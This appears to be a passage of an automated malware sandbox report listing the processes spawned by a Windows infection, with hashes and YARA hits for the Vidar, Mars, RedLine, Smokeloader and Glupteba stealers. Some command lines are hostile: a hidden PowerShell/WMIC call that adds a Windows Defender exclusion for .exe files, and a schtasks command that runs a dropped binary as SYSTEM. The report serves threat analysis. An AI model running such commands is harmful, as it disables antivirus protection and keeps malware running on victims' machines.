                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:21:37:14
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:6'711'576 bytes
                                                                                                                                                                                                                                MD5 hash:AAA56797070369AD346FBD9BB6CC5E8B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:21:37:15
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\u5v8.0.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:325'120 bytes
                                                                                                                                                                                                                                MD5 hash:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000A.00000003.1398448952.0000000004200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:21:37:15
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000B.00000003.1635257524.0000000006A1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                Start time:21:37:16
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:.\Install.exe /nxdidQZJ "385118" /S
                                                                                                                                                                                                                                Imagebase:0xd30000
                                                                                                                                                                                                                                File size:7'157'248 bytes
                                                                                                                                                                                                                                MD5 hash:E77964E011D8880EAE95422769249CA4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:21:37:18
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                Imagebase:0x40000
                                                                                                                                                                                                                                File size:41'472 bytes
                                                                                                                                                                                                                                MD5 hash:D95C443851F70F77427B3183B1619DD3
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:21:37:18
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:21:37:18
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                Imagebase:0xc30000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:21:37:18
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:21:37:19
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                Imagebase:0x200000
                                                                                                                                                                                                                                File size:427'008 bytes
                                                                                                                                                                                                                                MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:21:37:20
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000013.00000003.1674965384.0000000006B5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:21:37:20
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\u69w.0.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\u69w.0.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:325'120 bytes
                                                                                                                                                                                                                                MD5 hash:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000014.00000003.1454159777.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:21:37:22
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000015.00000002.1918521862.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000003.1847945255.0000000006A38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.1930196904.000000000434C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:21:37:24
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" "
                                                                                                                                                                                                                                Imagebase:0x7ff7ed720000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:21:37:25
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:21:37:25
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:8'538'160 bytes
                                                                                                                                                                                                                                MD5 hash:54D53F5BDB925B3ED005A84B5492447F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:21:37:25
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
                                                                                                                                                                                                                                Imagebase:0x3a0000
                                                                                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:21:37:25
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.1937757105.000000000408C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001B.00000002.1940278884.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:21:37:25
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:21:37:25
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.1939799886.000000000439C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001D.00000002.1938329589.0000000004300000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:21:37:27
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe"
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:4'407'808 bytes
                                                                                                                                                                                                                                MD5 hash:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:21:37:28
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\u4dc.0.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:325'120 bytes
                                                                                                                                                                                                                                MD5 hash:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:21:37:29
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:21:37:29
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:21:37:29
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000022.00000002.2122134547.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000003.2095182963.0000000006A3F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.2121373428.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:21:37:29
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\u69w.1.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\u69w.1.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'866'096 bytes
                                                                                                                                                                                                                                MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000023.00000000.1537903237.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u69w.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:21:37:30
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                Start time:21:37:31
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe em /VNsite_idnLd 385118 /S
                                                                                                                                                                                                                                Imagebase:0x280000
                                                                                                                                                                                                                                File size:7'157'248 bytes
                                                                                                                                                                                                                                MD5 hash:E77964E011D8880EAE95422769249CA4
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:38
